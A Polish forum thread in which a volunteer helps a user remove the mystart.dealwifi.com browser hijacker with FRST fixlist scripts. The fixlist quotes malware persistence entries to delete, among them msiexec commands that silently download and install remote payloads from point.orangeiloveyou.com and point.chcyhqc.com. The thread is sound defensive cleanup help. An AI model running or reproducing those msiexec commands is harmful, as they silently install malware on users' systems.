Przekierowanie mystart.dealwifi.com - porywacz przęglądarki

mlodszylele · 26 Kwiecień 2017 18:40

Witam

Mam problem z “mystart.dealwifi.com” tzw. porywaczem przeglądarki, próbowałem już wszystkiego co potrafiłem i nic nie pomogło. Mam antywirusa Avasta i używam głownie przeglądarki Firefoxa Mozilla>

Logi:

FRST - http://www.wklej.org/id/3098077/
Addition - http://www.wklej.org/id/3098086/

Mam nadzieje że dobrze to zrobiłem, jak coś proszę o pomoc w pozbyciu się tego dziadostwa.

Atis · 26 Kwiecień 2017 20:07

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

CloseProcesses: HKU\S-1-5-21-272777192-2743495117-1981564813-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj82FTI2MjwcMkNYFjI1Mjw4MTNYRkF2MWLXRWI3FTlQRH== /q IFEO\taskmgr.exe: [Debugger] FF Extension: (SimilarWeb) - C:\Users\Admin\AppData\Roaming\Firefox\Firefox\Profiles\0nejma8k.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-04-25] [Brak podpisu cyfrowego] FF Extension: (HSearch) - C:\Users\Admin\AppData\Roaming\Firefox\Firefox\Profiles\0nejma8k.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-04-25] [Brak podpisu cyfrowego] FF Extension: (FF Adr) - C:\Users\Admin\AppData\Roaming\Firefox\Firefox\Profiles\0nejma8k.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-25] [Brak podpisu cyfrowego] FF SearchPlugin: C:\Users\Admin\AppData\Roaming\Firefox\Firefox\Profiles\0nejma8k.default\searchplugins\startsearch.xml [2017-04-25] CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited) S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== UWAGA S3 MSICDSetup; \??\G:\CDriver64.sys [X] S3 NTIOLib_1_0_C; \??\G:\NTIOLib_X64.sys [X] R2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [110592 2017-04-24] () [Brak podpisu cyfrowego] 2017-04-25 17:37 - 2017-04-25 17:37 - 00000000 ____D C:\ProgramData\Apple 2017-04-26 19:35 - 2017-04-26 19:35 - 00000000 ____D C:\Users\Admin\Desktop\FRST-OlderVersion 2017-04-26 19:26 - 2017-04-26 19:26 - 00000000 ____D C:\ProgramData\SWCUTemp 2017-04-25 17:37 - 2017-04-26 05:45 - 00000000 _____ C:\Users\Public\Documents\report.dat 2017-04-25 17:37 - 2017-04-25 17:37 - 00000000 ____D C:\Windows\system32\log 2017-04-25 17:37 - 2017-04-25 17:37 - 00000000 ____D C:\Users\Admin\AppData\Roaming\Firefox 2017-04-25 17:37 - 2017-04-25 17:37 - 00000000 ____D C:\Users\Admin\AppData\Local\Firefox 2017-04-25 17:37 - 2017-04-25 17:37 - 00000000 ____D C:\Users\Admin\AppData\Local\Doeye 2017-04-25 17:37 - 2017-04-25 17:37 - 00000000 ____D C:\Program Files (x86)\Firefox 2017-04-25 17:37 - 2017-04-25 17:37 - 00000000 ____D C:\Program Files (x86)\Doeye 2017-04-25 17:37 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeKrnlBoot.sys 2017-04-25 17:37 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeNetFilter.sys 2017-04-22 09:01 - 2017-04-26 18:50 - 00000000 _____ C:\Users\Public\Documents\temp.dat 2017-04-21 17:41 - 2017-04-25 17:37 - 00000000 _____ C:\Windows\SysWOW64\33 2017-04-21 17:41 - 2017-04-25 17:37 - 00000000 _____ C:\Windows\SysWOW64\11 2017-04-19 22:20 - 2017-04-22 00:43 - 00000000 ____D C:\AdwCleaner 2017-04-19 17:50 - 2017-04-19 22:17 - 00000000 ____D C:\Users\Admin\AppData\Local\3DM 2017-04-19 17:45 - 2017-04-25 17:36 - 00000000 ____D C:\Program Files (x86)\BiaoJi 2017-04-07 21:10 - 2017-04-07 21:10 - 01255768 _____ ( ) C:\Users\Admin\Downloads\foobar2000-13337-AsystentPobierania.exe 2017-04-13 21:39 - 2017-02-18 10:17 - 00000000 ____D C:\Users\Admin\AppData\Roaming\ScreenShot C:\Users\Admin\AppData\Roaming\Minecraft 1.9.0.exe C:\Program Files (x86)\ScreenShot Task: {1BD9BCA8-F8C6-41F8-BAEE-6C96AE1A576F} - \PowerWord-SCT-JT -> Brak pliku <==== UWAGA Task: {07745AAC-C3EE-4732-B28B-CA80FFF5A567} - System32\Tasks\Opera scheduled suite Autoupdate 1486935636 => C:\Users\Admin\AppData\Local\Programs\Opera\launcher.exe [2017-02-27] (Opera Software) Task: {A6761DC8-66AE-4A66-8255-51645AD23B4C} - System32\Tasks\Opera scheduled Autoupdate 1486935635 => C:\Users\Admin\AppData\Local\Programs\Opera\launcher.exe [2017-02-27] (Opera Software) Task: {DCF175BA-217A-4DC4-94CE-ABBC8627BFD6} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q Task: {E716AA2E-91C7-4B9F-8ACC-A25103D3E48E} - System32\Tasks\{58AEC91D-BBCC-4727-A767-00A206BBC88E} => pcalua.exe -a "C:\Users\Admin\Desktop\Moje dokumenty\Programy\wp5_3pl.exe" -d "C:\Users\Admin\Desktop\Moje dokumenty\Programy" Task: {F9D96F4C-FD1A-4824-A974-8E8B71CAC5C9} - \Windows-WoShiBeiYongDe -> Brak pliku <==== UWAGA Shortcut: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) R2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [110592 2017-04-24] () [Brak podpisu cyfrowego] 2017-04-25 17:37 - 2017-04-25 17:37 - 00000000 ____D C:\ProgramData\Apple FirewallRules: [{1F227469-11D2-4A32-ABEB-4857B8A7FB68}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{D8A16020-3E60-44EB-A750-BA477C765479}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe FirewallRules: [{9D523995-54F6-4C14-A3A3-09C236E41F68}] => (Allow) C:\Program Files (x86)\Doeye\Application\chrome.exe EmptyTemp:
Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST bez Addition i Shortcut.

mlodszylele · 26 Kwiecień 2017 21:44

Zrobiłem i tak:

Raport z usuwania Fixlog - http://www.wklej.org/id/3098230/

Skan po usuwaniu:

FRST - http://www.wklej.org/id/3098232/

Z tego co zobaczyłem nie mogę uruchomić Chroma a Firefox jest tylko po angielsku, wszystko teraz robiłem na Operze

Atis · 26 Kwiecień 2017 23:31

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

C:\Users\Admin\AppData\Roaming\Firefox C:\Users\Admin\AppData\Local\Firefox C:\ProgramData\SWCUTemp C:\Users\Public\Documents\temp.dat DeleteQuarantine:
Uruchom FRST i kliknij Napraw (Fix). Później skasuj folder C:\FRST
Czyszczenie folderów Przywracania systemu
Przeczytaj w jaki sposób należy instalować programy: KLIK - KLIK - KLIK.

anon82843335 · 27 Kwiecień 2017 06:45

A potraktuj go ADWCleanerem…
I pozbądź się AVASTa

mlodszylele · 28 Kwiecień 2017 15:35

Zrobione, a co polecacie zamiast Avasta, jakoś się do niego przyzwyczaiłem i na poprzednim komputerze gdzie miałem XPka działał dobrze a na nowym kompie gdzie mam Windowsa 7 po 3 miesiącach zaczęły się jakieś dziadostwa w przeglądarkach,

Acorus · 28 Kwiecień 2017 15:51

To nie ma nic wspólnego z Avastem.Możesz go zostawić.

mlodszylele · 28 Kwiecień 2017 16:01

Aha. Dziękuję za informację. Dziękuję za pomoc. Temat można zamknąć.